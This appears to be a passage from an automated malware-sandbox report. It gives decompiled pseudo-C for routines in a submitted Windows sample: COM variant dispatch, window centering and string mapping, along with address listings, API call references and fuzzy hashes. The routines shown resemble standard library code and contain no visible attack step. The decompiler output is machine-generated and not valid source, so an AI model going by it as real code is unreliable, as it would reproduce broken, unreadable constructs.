							_t200 =  *((intOrPtr*)(_t247 + 0x1c));
							_t246 =  &(_t245[4]);
							_t22 = _t200 - 4; // 0xfffffff9
							_t217 = _t22;
							 *(_t247 - 0x18) = _t246;
							 *((intOrPtr*)(_t247 + 0x1c)) =  *((intOrPtr*)(_t247 + 0x1c)) + 0xfffffff8;
							_t238 = 4;
							do {
								_t203 =  *( *(_t247 - 0x14)) & 0x000000ff;
								_t224 =  *(_t247 - 0x10);
								 *_t224 = _t203;
								if((_t203 & 0x00000040) != 0) {
									 *_t224 = _t203 & 0x0000ffbf | 0x00004000;
								}
								_t204 =  *_t224 & 0x0000ffff;
								_t263 = _t204 - 0x4002;
								if(_t263 > 0) {
									_t205 = _t204 - 0x4003;
									__eflags = _t205 - 0x12;
									if(_t205 <= 0x12) {
										switch( *((intOrPtr*)(_t205 * 4 +  &M0043017B))) {
											case 0:
												goto L36;
											case 1:
												 *((intOrPtr*)(_t247 + 0x1c)) =  *((intOrPtr*)(_t247 + 0x1c)) + _t238;
												_t217 = _t217 + _t238;
												_t207 =  *_t217;
												asm("sbb ecx, ecx");
												 *_t207 =  ~( *_t207) & 0x0000ffff;
												goto L37;
											case 2:
												goto L38;
										}
									}
								} else {
									if(_t263 == 0) {
										L36:
										 *((intOrPtr*)(_t247 + 0x1c)) =  *((intOrPtr*)(_t247 + 0x1c)) + _t238;
										_t217 = _t217 + _t238;
										__eflags = _t217;
										_t207 =  *_t217;
										L37:
										 *_t246 = _t207;
									} else {
										_t209 = _t204;
										if(_t209 <= 0x13) {
											switch( *((intOrPtr*)(_t209 * 4 +  &M0043012B))) {
												case 0:
													 *((intOrPtr*)(_t247 + 0x1c)) =  *((intOrPtr*)(_t247 + 0x1c)) + _t238;
													_t217 = _t217 + _t238;
													_t210 =  *_t217;
													goto L16;
												case 1:
													goto L36;
												case 2:
													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
													__eax =  *(__ebp + 0x1c);
													__ebx = __ebx + 8;
													 *__esi =  *( *(__ebp + 0x1c));
													goto L38;
												case 3:
													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
													__eax =  *(__ebp + 0x1c);
													__ebx = __ebx + 8;
													 *__esi =  *( *(__ebp + 0x1c));
													goto L38;
												case 4:
													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
													__ebx = __ebx + __edi;
													__eflags = __ebx;
													__eax =  *__ebx;
													__ecx =  *__eax;
													goto L22;
												case 5:
													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
													__ebx = __ebx + __edi;
													__eax =  *__ebx;
													_push(__eax);
													 *(__ebp - 0x18) = __eax;
													__imp__#2();
													__eflags =  *(__ebp - 0x18);
													 *__esi = __eax;
													if( *(__ebp - 0x18) != 0) {
														__eflags = __eax;
														if(__eax == 0) {
															goto L25;
														}
													}
													goto L38;
												case 6:
													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
													__ebx = __ebx + __edi;
													 *__ebx =  ~( *__ebx);
													asm("sbb eax, eax");
													L16:
													 *_t246 = _t210;
													goto L38;
												case 7:
													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 4;
													__edi =  *(__ebp - 0x10);
													__ebx = __ebx + 4;
													__esi =  *__ebx;
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__esi =  *(__ebp - 0x18);
													_push(4);
													_pop(__edi);
													goto L38;
												case 8:
													L26:
													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
													__ebx = __ebx + __edi;
													__eax =  *__ebx;
													__eflags = __eax;
													 *(__ebp - 0x18) = __eax;
													if(__eax != 0) {
														__eax = lstrlenA( *(__ebp - 0x18));
														__eax = __eax + 1;
														 *(__ebp - 0x24) = __eax;
														__eax = __eax + __eax;
														__eax = __eax + 3;
														__eax = __eax & 0xfffffffc;
														__eflags = __eax;
														__eax = __esp;
														__eax = E00408F24(__esp,  *(__ebp - 0x18),  *(__ebp - 0x24),  *((intOrPtr*)(__ebp - 0x20)));
													}
													_push(__eax);
													__imp__#2();
													__eflags =  *(__ebp - 0x18);
													 *__esi = __eax;
													if( *(__ebp - 0x18) != 0) {
														__eflags = __eax;
														if(__eax == 0) {
															L25:
															__eax = E00422EAF(__ecx);
															goto L26;
														}
													}
													__eax =  *(__ebp - 0x10);
													 *( *(__ebp - 0x10)) = 8;
													goto L38;
												case 9:
													goto L38;
												case 0xa:
													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
													__ebx = __ebx + __edi;
													 *__esi =  *__ebx;
													goto L38;
												case 0xb:
													__eax =  *(__ebp + 0x1c);
													__eax =  *(__ebp + 0x1c) + 8;
													__ecx =  *__eax;
													 *(__ebp + 0x1c) = __eax;
													__ebx = __ebx + 8;
													L22:
													 *__esi = __ecx;
													__esi[4] = __eax;
													goto L38;
											}
										}
									}
								}
								L38:
								 *(_t247 - 0x10) =  *(_t247 - 0x10) - 0x10;
								_t246 = _t246 - 0x10;
								 *(_t247 - 0x14) =  &(( *(_t247 - 0x14))[1]);
								 *(_t247 - 0x18) = _t246;
							} while ( *( *(_t247 - 0x14)) != 0);
							_t235 =  *(_t247 + 0x18);
							_t214 = 0;
						}
					}
					_t242 = 0;
					E0041162C(_t247 - 0x3c);
					if( *(_t247 + 0x10) != _t214) {
						_t242 = _t247 - 0x3c;
					}
					E00412140(_t247 - 0x6c, _t214, 0x20);
					_t170 =  *((intOrPtr*)( *((intOrPtr*)(_t247 - 0x28))));
					 *(_t247 - 0x2c) =  *(_t247 - 0x2c) | 0xffffffff;
					 *(_t247 + 0x18) =  *((intOrPtr*)( *_t170 + 0x18))(_t170,  *((intOrPtr*)(_t247 + 8)), 0x44ddcc, _t214,  *(_t247 + 0xc), _t247 - 0x4c, _t242, _t247 - 0x6c, _t247 - 0x2c);
					_t172 =  *(_t247 - 0x44);
					if(_t172 != _t214) {
						_t214 = (_t172 << 4) +  *((intOrPtr*)(_t247 - 0x4c)) - 0x10;
						_t242 = _t235;
						if( *_t235 != 0) {
							do {
								_t192 =  *_t242;
								if(_t192 == 8 || _t192 == 0xe) {
									__imp__#9(_t214);
								}
								_t214 = _t214 - 0x10;
								_t242 = _t242 + 1;
								_t273 =  *_t242;
							} while ( *_t242 != 0);
						}
					}
					_push( *((intOrPtr*)(_t247 - 0x4c)));
					_t161 = L0042446B(_t214, _t235, _t242, _t273);
					_pop(_t221);
					if( *(_t247 + 0x18) >= 0) {
						L63:
						_t242 =  *(_t247 + 0x10);
						__eflags = _t242;
						if(_t242 != 0) {
							__eflags = _t242 - 0xc;
							if(_t242 != 0xc) {
								_t174 = _t247 - 0x3c;
								__imp__#12(_t174, _t174, 0, _t242);
								_t236 = _t174;
								__eflags = _t236;
								if(_t236 < 0) {
									__imp__#9(_t247 - 0x3c);
									_push(_t236);
									goto L67;
								}
							}
							goto L68;
						}
					} else {
						__imp__#9(_t247 - 0x3c);
						if( *(_t247 + 0x18) == 0x80020009) {
							__eflags =  *(_t247 - 0x54);
							if( *(_t247 - 0x54) != 0) {
								 *(_t247 - 0x54)(_t247 - 0x6c);
							}
							_t178 = E00424440(0x20);
							_pop(_t221);
							 *(_t247 + 0x14) = _t178;
							__eflags = _t178;
							 *(_t247 - 4) = 0;
							if(_t178 == 0) {
								_t243 = 0;
								__eflags = 0;
							} else {
								_push( *((intOrPtr*)(_t247 - 0x6c)));
								_t221 = _t178;
								_push(0);
								_push(0);
								_t243 = E0042FBE4(_t178);
							}
							 *(_t247 - 4) =  *(_t247 - 4) | 0xffffffff;
							__eflags =  *(_t247 - 0x68);
							_t237 = __imp__#6;
							if( *(_t247 - 0x68) != 0) {
								_t113 = _t243 + 0x18; // 0x18
								_t221 = _t113;
								E00409CC2(_t113, _t247,  *(_t247 - 0x68));
								 *_t237( *(_t247 - 0x68));
							}
							__eflags =  *(_t247 - 0x64);
							if( *(_t247 - 0x64) != 0) {
								_t117 = _t243 + 0xc; // 0xc
								_t221 = _t117;
								E00409CC2(_t117, _t247,  *(_t247 - 0x64));
								 *_t237( *(_t247 - 0x64));
							}
							__eflags =  *(_t247 - 0x60);
							if( *(_t247 - 0x60) != 0) {
								_t121 = _t243 + 0x14; // 0x14
								_t221 = _t121;
								E00409CC2(_t121, _t247,  *(_t247 - 0x60));
								 *_t237( *(_t247 - 0x60));
							}
							 *((intOrPtr*)(_t243 + 0x10)) =  *((intOrPtr*)(_t247 - 0x5c));
							 *((intOrPtr*)(_t243 + 0x1c)) =  *((intOrPtr*)(_t247 - 0x50));
							 *(_t247 + 0x14) = _t243;
							_t161 = E004128BF(_t247 + 0x14, 0x452e7c);
							goto L63;
						} else {
							_push( *(_t247 + 0x18));
							L67:
							E0042E969(_t221);
							L68:
							_t161 = (_t242 & 0x0000ffff) + 0xfffffffe;
							if(_t161 <= 0x13) {
								switch( *((intOrPtr*)(_t161 * 4 +  &M004301C7))) {
									case 0:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x34);
										goto L79;
									case 1:
										__ecx =  *(__ebp - 0x34);
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x34);
										goto L79;
									case 2:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x34);
										goto L79;
									case 3:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x34);
										goto L79;
									case 4:
										__ecx =  *(__ebp - 0x34);
										__eax =  *(__ebp + 0x14);
										 *__eax =  *(__ebp - 0x34);
										__ecx =  *(__ebp - 0x30);
										 *(__eax + 4) =  *(__ebp - 0x30);
										goto L79;
									case 5:
										__eax = E0042E38D(__eax,  *(__ebp + 0x14),  *(__ebp - 0x34));
										_push( *(__ebp - 0x34));
										__imp__#6();
										goto L79;
									case 6:
										__ecx =  *(__ebp + 0x14);
										__eax = 0;
										__eflags =  *(__ebp - 0x34) - __bx;
										__eax = 0 | __eflags != 0x00000000;
										 *( *(__ebp + 0x14)) = __eflags != 0;
										goto L79;
									case 7:
										__edi =  *(__ebp + 0x14);
										__esi = __ebp - 0x3c;
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										goto L79;
									case 8:
										goto L79;
									case 9:
										_t161 =  *(_t247 + 0x14);
										 *_t161 =  *((intOrPtr*)(_t247 - 0x34));
										goto L79;
								}
							}
						}
					}
				}
				L79:
				 *[fs:0x0] =  *((intOrPtr*)(_t247 - 0xc));
				return _t161;
			}






































                                                                              0x0042fcbb
                                                                              0x0042fcc0
                                                                              0x0042fcc8
                                                                              0x0042fccb
                                                                              0x0042fcd1
                                                                              0x0042fcd5
                                                                              0x0042fcd8
                                                                              0x0042fce5
                                                                              0x0042fcea
                                                                              0x0042fced
                                                                              0x0042fcf2
                                                                              0x0042fd00
                                                                              0x0042fcf4
                                                                              0x0042fcf5
                                                                              0x0042fcfb
                                                                              0x0042fcfb
                                                                              0x0042fd07
                                                                              0x0042fd0e
                                                                              0x0042fd13
                                                                              0x0042fd1a
                                                                              0x0042fd1a
                                                                              0x0042fd1f
                                                                              0x0042fd2e
                                                                              0x0042fd39
                                                                              0x0042fd3c
                                                                              0x0042fd47
                                                                              0x0042fd4d
                                                                              0x0042fd51
                                                                              0x0042fd54
                                                                              0x0042fd57
                                                                              0x0042fd5d
                                                                              0x0042fd60
                                                                              0x0042fd63
                                                                              0x0042fd63
                                                                              0x0042fd6b
                                                                              0x0042fd6e
                                                                              0x0042fd71
                                                                              0x0042fd72
                                                                              0x0042fd75
                                                                              0x0042fd7b
                                                                              0x0042fd7e
                                                                              0x0042fd81
                                                                              0x0042fd8b
                                                                              0x0042fd8b
                                                                              0x0042fd8e
                                                                              0x0042fd96
                                                                              0x0042fd98
                                                                              0x0042fec8
                                                                              0x0042fecd
                                                                              0x0042fed0
                                                                              0x0042fed2
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042fed9
                                                                              0x0042fedc
                                                                              0x0042fede
                                                                              0x0042fee4
                                                                              0x0042feec
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042fed2
                                                                              0x0042fd9e
                                                                              0x0042fd9e
                                                                              0x0042fef0
                                                                              0x0042fef0
                                                                              0x0042fef3
                                                                              0x0042fef3
                                                                              0x0042fef5
                                                                              0x0042fef7
                                                                              0x0042fef7
                                                                              0x0042fda4
                                                                              0x0042fda5
                                                                              0x0042fda9
                                                                              0x0042fdaf
                                                                              0x00000000
                                                                              0x0042fdb6
                                                                              0x0042fdb9
                                                                              0x0042fdbb
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042fde4
                                                                              0x0042fde8
                                                                              0x0042fded
                                                                              0x0042fdf0
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042fdf7
                                                                              0x0042fdfb
                                                                              0x0042fe00
                                                                              0x0042fe03
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042fe0a
                                                                              0x0042fe0d
                                                                              0x0042fe0d
                                                                              0x0042fe0f
                                                                              0x0042fe11
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042fe20
                                                                              0x0042fe23
                                                                              0x0042fe25
                                                                              0x0042fe27
                                                                              0x0042fe28
                                                                              0x0042fe2b
                                                                              0x0042fe31
                                                                              0x0042fe35
                                                                              0x0042fe37
                                                                              0x0042fe3d
                                                                              0x0042fe3f
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042fe3f
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042fea0
                                                                              0x0042fea3
                                                                              0x0042fea7
                                                                              0x0042fea9
                                                                              0x0042fdbe
                                                                              0x0042fdbe
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042feb0
                                                                              0x0042feb4
                                                                              0x0042feb7
                                                                              0x0042feba
                                                                              0x0042febc
                                                                              0x0042febd
                                                                              0x0042febe
                                                                              0x0042febf
                                                                              0x0042fec0
                                                                              0x0042fec3
                                                                              0x0042fec5
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042fe4a
                                                                              0x0042fe4a
                                                                              0x0042fe4d
                                                                              0x0042fe4f
                                                                              0x0042fe51
                                                                              0x0042fe53
                                                                              0x0042fe56
                                                                              0x0042fe5b
                                                                              0x0042fe61
                                                                              0x0042fe62
                                                                              0x0042fe65
                                                                              0x0042fe67
                                                                              0x0042fe6a
                                                                              0x0042fe6a
                                                                              0x0042fe72
                                                                              0x0042fe7e
                                                                              0x0042fe7e
                                                                              0x0042fe83
                                                                              0x0042fe84
                                                                              0x0042fe8a
                                                                              0x0042fe8e
                                                                              0x0042fe90
                                                                              0x0042fe92
                                                                              0x0042fe94
                                                                              0x0042fe45
                                                                              0x0042fe45
                                                                              0x00000000
                                                                              0x0042fe45
                                                                              0x0042fe94
                                                                              0x0042fe96
                                                                              0x0042fe99
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042fdd6
                                                                              0x0042fdd9
                                                                              0x0042fddd
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042fdc6
                                                                              0x0042fdc9
                                                                              0x0042fdcc
                                                                              0x0042fdce
                                                                              0x0042fdd1
                                                                              0x0042fe13
                                                                              0x0042fe13
                                                                              0x0042fe18
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042fdaf
                                                                              0x0042fda9
                                                                              0x0042fd9e
                                                                              0x0042fef9
                                                                              0x0042fef9
                                                                              0x0042fefd
                                                                              0x0042ff00
                                                                              0x0042ff09
                                                                              0x0042ff09
                                                                              0x0042ff12
                                                                              0x0042ff15
                                                                              0x0042ff15
                                                                              0x0042fd57
                                                                              0x0042ff1b
                                                                              0x0042ff1d
                                                                              0x0042ff26
                                                                              0x0042ff28
                                                                              0x0042ff28
                                                                              0x0042ff32
                                                                              0x0042ff3a
                                                                              0x0042ff3c
                                                                              0x0042ff62
                                                                              0x0042ff65
                                                                              0x0042ff6a
                                                                              0x0042ff75
                                                                              0x0042ff79
                                                                              0x0042ff7b
                                                                              0x0042ff7d
                                                                              0x0042ff7d
                                                                              0x0042ff81
                                                                              0x0042ff88
                                                                              0x0042ff88
                                                                              0x0042ff8e
                                                                              0x0042ff91
                                                                              0x0042ff92
                                                                              0x0042ff92
                                                                              0x0042ff7d
                                                                              0x0042ff7b
                                                                              0x0042ff97
                                                                              0x0042ff9a
                                                                              0x0042ffa4
                                                                              0x0042ffa5
                                                                              0x0043005c
                                                                              0x0043005c
                                                                              0x0043005f
                                                                              0x00430062
                                                                              0x00430068
                                                                              0x0043006c
                                                                              0x00430070
                                                                              0x00430075
                                                                              0x0043007b
                                                                              0x0043007d
                                                                              0x0043007f
                                                                              0x00430085
                                                                              0x0043008b
                                                                              0x00000000
                                                                              0x0043008b
                                                                              0x0043007f
                                                                              0x00000000
                                                                              0x0043006c
                                                                              0x0042ffab
                                                                              0x0042ffaf
                                                                              0x0042ffbc
                                                                              0x0042ffc6
                                                                              0x0042ffc9
                                                                              0x0042ffcf
                                                                              0x0042ffcf
                                                                              0x0042ffd4
                                                                              0x0042ffd9
                                                                              0x0042ffda
                                                                              0x0042ffdd
                                                                              0x0042ffdf
                                                                              0x0042ffe2
                                                                              0x0042fff4
                                                                              0x0042fff4
                                                                              0x0042ffe4
                                                                              0x0042ffe4
                                                                              0x0042ffe7
                                                                              0x0042ffe9
                                                                              0x0042ffea
                                                                              0x0042fff0
                                                                              0x0042fff0
                                                                              0x0042fff6
                                                                              0x0042fffa
                                                                              0x0042fffd
                                                                              0x00430003
                                                                              0x00430008
                                                                              0x00430008
                                                                              0x0043000b
                                                                              0x00430013
                                                                              0x00430013
                                                                              0x00430015
                                                                              0x00430018
                                                                              0x0043001d
                                                                              0x0043001d
                                                                              0x00430020
                                                                              0x00430028
                                                                              0x00430028
                                                                              0x0043002a
                                                                              0x0043002d
                                                                              0x00430032
                                                                              0x00430032
                                                                              0x00430035
                                                                              0x0043003d
                                                                              0x0043003d
                                                                              0x00430042
                                                                              0x00430048
                                                                              0x00430054
                                                                              0x00430057
                                                                              0x00000000
                                                                              0x0042ffbe
                                                                              0x0042ffbe
                                                                              0x0043008c
                                                                              0x0043008c
                                                                              0x00430091
                                                                              0x00430094
                                                                              0x0043009a
                                                                              0x0043009c
                                                                              0x00000000
                                                                              0x004300ad
                                                                              0x004300b4
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0043010f
                                                                              0x00430112
                                                                              0x00430115
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004300cc
                                                                              0x004300cf
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004300d6
                                                                              0x004300d9
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004300b9
                                                                              0x004300bc
                                                                              0x004300bf
                                                                              0x004300c1
                                                                              0x004300c4
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004300e3
                                                                              0x004300e8
                                                                              0x004300eb
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004300f3
                                                                              0x004300f6
                                                                              0x004300f8
                                                                              0x004300fc
                                                                              0x004300ff
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00430103
                                                                              0x00430106
                                                                              0x00430109
                                                                              0x0043010a
                                                                              0x0043010b
                                                                              0x0043010c
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004300a3
                                                                              0x004300a9
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0043009c
                                                                              0x0043009a
                                                                              0x0042ffbc
                                                                              0x0042ffa5
                                                                              0x00430117
                                                                              0x0043011d
                                                                              0x00430128

                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 0042FCBB
                                                                              • lstrlenA.KERNEL32(?,?,?), ref: 0042FCF5
                                                                              • VariantClear.OLEAUT32(?), ref: 0042FF88
                                                                              • VariantClear.OLEAUT32(?), ref: 0042FFAF
                                                                              • SysFreeString.OLEAUT32(?), ref: 00430013
                                                                              • SysFreeString.OLEAUT32(?), ref: 00430028
                                                                              • SysFreeString.OLEAUT32(?), ref: 0043003D
                                                                              • VariantChangeType.OLEAUT32(?,?,00000000,?), ref: 00430075
                                                                              • VariantClear.OLEAUT32(?), ref: 00430085
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Variant$ClearFreeString$ChangeH_prologTypelstrlen
                                                                              • String ID:
                                                                              • API String ID: 344392101-0
                                                                              • Opcode ID: 3b057a521ef479f7f189b715b034f6f8b40d57809903969610460b76977b1eba
                                                                              • Instruction ID: b228736aa9f8fd026ff5359b619d8e15a9365acb0fa6e0a946a76f8a86906c3d
                                                                              • Opcode Fuzzy Hash: 3b057a521ef479f7f189b715b034f6f8b40d57809903969610460b76977b1eba
                                                                              • Instruction Fuzzy Hash: 2BE1CF71A0021ADFCF11DFA8E880AAEBBB4FF09304F94013AE951A7261D7789D55CF59
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00425CF5, Relevance: 19.7, APIs: 13, Instructions: 174windowCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 90%
                                                                              			E00425CF5(intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				signed int _v5;
				intOrPtr _v8;
				intOrPtr _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				struct tagRECT _v60;
				struct tagRECT _v80;
				char _v100;
				intOrPtr _t55;
				struct HWND__* _t56;
				intOrPtr _t78;
				intOrPtr _t90;
				signed int _t99;
				struct HWND__* _t100;
				struct HWND__* _t102;
				void* _t104;
				long _t110;
				void* _t113;
				struct HWND__* _t115;
				void* _t117;
				intOrPtr _t119;
				intOrPtr _t123;

				_t113 = __edx;
				_t119 = __ecx;
				_v12 = __ecx;
				_v8 = E00428375(__ecx);
				_t55 = _a4;
				if(_t55 == 0) {
					if((_v5 & 0x00000040) == 0) {
						_t56 = GetWindow( *(__ecx + 0x1c), 4);
					} else {
						_t56 = GetParent( *(__ecx + 0x1c));
					}
					_t115 = _t56;
					if(_t115 != 0) {
						_t100 = SendMessageA(_t115, 0x36b, 0, 0);
						if(_t100 != 0) {
							_t115 = _t100;
						}
					}
				} else {
					_t115 =  *(_t55 + 0x1c);
				}
				GetWindowRect( *(_t119 + 0x1c),  &_v44);
				if((_v5 & 0x00000040) != 0) {
					_t102 = GetParent( *(_t119 + 0x1c));
					GetClientRect(_t102,  &_v28);
					GetClientRect(_t115,  &_v60);
					MapWindowPoints(_t115, _t102,  &_v60, 2);
				} else {
					if(_t115 != 0) {
						_t99 = GetWindowLongA(_t115, 0xfffffff0);
						if((_t99 & 0x10000000) == 0 || (_t99 & 0x20000000) != 0) {
							_t115 = 0;
						}
					}
					_v100 = 0x28;
					if(_t115 != 0) {
						GetWindowRect(_t115,  &_v60);
						E00409286(E0040921B(_t115, 2),  &_v100);
						CopyRect( &_v28,  &_v80);
					} else {
						_t90 = E00408116();
						if(_t90 != 0) {
							_t90 =  *((intOrPtr*)(_t90 + 0x1c));
						}
						E00409286(E0040921B(_t90, 1),  &_v100);
						CopyRect( &_v60,  &_v80);
						CopyRect( &_v28,  &_v80);
					}
				}
				_t117 = _v44.right - _v44.left;
				asm("cdq");
				_t104 = _v44.bottom - _v44.top;
				asm("cdq");
				_t114 = _v60.bottom;
				_t110 = (_v60.left + _v60.right - _t113 >> 1) - (_t117 - _t113 >> 1);
				asm("cdq");
				asm("cdq");
				_t123 = (_v60.top + _v60.bottom - _v60.bottom >> 1) - (_t104 - _t114 >> 1);
				if(_t110 >= _v28.left) {
					_t78 = _v28.right;
					if(_t117 + _t110 > _t78) {
						_t110 = _t78 - _v44.right + _v44.left;
					}
				} else {
					_t110 = _v28.left;
				}
				if(_t123 >= _v28.top) {
					if(_t104 + _t123 > _v28.bottom) {
						_t123 = _v44.top - _v44.bottom + _v28.bottom;
					}
				} else {
					_t123 = _v28.top;
				}
				return E0042856F(_v12, 0, _t110, _t123, 0xffffffff, 0xffffffff, 0x15);
			}

























                                                                              0x00425cf5
                                                                              0x00425cfd
                                                                              0x00425d00
                                                                              0x00425d08
                                                                              0x00425d0b
                                                                              0x00425d10
                                                                              0x00425d1b
                                                                              0x00425d2d
                                                                              0x00425d1d
                                                                              0x00425d20
                                                                              0x00425d20
                                                                              0x00425d33
                                                                              0x00425d37
                                                                              0x00425d43
                                                                              0x00425d4b
                                                                              0x00425d4d
                                                                              0x00425d4d
                                                                              0x00425d4b
                                                                              0x00425d12
                                                                              0x00425d12
                                                                              0x00425d12
                                                                              0x00425d5c
                                                                              0x00425d62
                                                                              0x00425e02
                                                                              0x00425e09
                                                                              0x00425e10
                                                                              0x00425e1a
                                                                              0x00425d68
                                                                              0x00425d6a
                                                                              0x00425d6f
                                                                              0x00425d7a
                                                                              0x00425d83
                                                                              0x00425d83
                                                                              0x00425d7a
                                                                              0x00425d87
                                                                              0x00425d8e
                                                                              0x00425dcf
                                                                              0x00425dde
                                                                              0x00425deb
                                                                              0x00425d90
                                                                              0x00425d90
                                                                              0x00425d97
                                                                              0x00425d99
                                                                              0x00425d99
                                                                              0x00425da9
                                                                              0x00425dbc
                                                                              0x00425dc6
                                                                              0x00425dc6
                                                                              0x00425d8e
                                                                              0x00425e29
                                                                              0x00425e2e
                                                                              0x00425e34
                                                                              0x00425e3b
                                                                              0x00425e3e
                                                                              0x00425e45
                                                                              0x00425e4c
                                                                              0x00425e53
                                                                              0x00425e5a
                                                                              0x00425e5f
                                                                              0x00425e66
                                                                              0x00425e6d
                                                                              0x00425e75
                                                                              0x00425e75
                                                                              0x00425e61
                                                                              0x00425e61
                                                                              0x00425e61
                                                                              0x00425e7a
                                                                              0x00425e86
                                                                              0x00425e8e
                                                                              0x00425e8e
                                                                              0x00425e7c
                                                                              0x00425e7c
                                                                              0x00425e7c
                                                                              0x00425ea7

                                                                              APIs
                                                                                • Part of subcall function 00428375: GetWindowLongA.USER32 ref: 00428380
                                                                              • GetParent.USER32(?), ref: 00425D20
                                                                              • SendMessageA.USER32(00000000,0000036B,00000000,00000000), ref: 00425D43
                                                                              • GetWindowRect.USER32 ref: 00425D5C
                                                                              • GetWindowLongA.USER32 ref: 00425D6F
                                                                              • CopyRect.USER32 ref: 00425DBC
                                                                              • CopyRect.USER32 ref: 00425DC6
                                                                              • GetWindowRect.USER32 ref: 00425DCF
                                                                              • CopyRect.USER32 ref: 00425DEB
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Rect$Window$Copy$Long$MessageParentSend
                                                                              • String ID:
                                                                              • API String ID: 808654186-0
                                                                              • Opcode ID: 154255a76cca9447de4351d56dab5eca5582396a9e15d9205caf6b4785139203
                                                                              • Instruction ID: 35932f71d77ad1146e83b777f3b005d173e21e8154cefdfefc433d27175537c6
                                                                              • Opcode Fuzzy Hash: 154255a76cca9447de4351d56dab5eca5582396a9e15d9205caf6b4785139203
                                                                              • Instruction Fuzzy Hash: 2D51C771A00629AFCB04DBA8ED49EEEB7BDAF44300F454125E501F3291DB74ED018B58
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00419558, Relevance: 16.8, APIs: 11, Instructions: 299COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 73%
                                                                              			E00419558(void* __ebx, void* __edi, int __esi, void* __eflags) {
				signed int _t119;
				intOrPtr _t120;
				int _t122;
				char* _t125;
				int _t132;
				signed int _t134;
				int _t137;
				int _t138;
				int _t157;
				short* _t160;
				short* _t163;
				int _t164;
				signed int _t165;
				long _t169;
				signed int _t172;
				int _t181;
				char* _t183;
				int _t184;
				signed int _t186;
				int _t187;
				int _t190;
				void* _t192;
				short* _t193;
				char* _t195;
				char* _t196;
				signed int _t199;

				_t185 = __esi;
				_push(0x38);
				_push(0x44c648);
				E00412BA4(__ebx, __edi, __esi);
				_t199 =  *0x45a748; // 0x1
				if(_t199 == 0) {
					_t185 = 1;
					if(LCMapStringW(0, 0x100, 0x44bd1c, 1, 0, 0) == 0) {
						_t169 = GetLastError();
						__eflags = _t169 - 0x78;
						if(_t169 == 0x78) {
							 *0x45a748 = 2;
						}
					} else {
						 *0x45a748 = 1;
					}
				}
				if( *(_t192 + 0x14) <= 0) {
					L11:
					_t119 =  *0x45a748; // 0x1
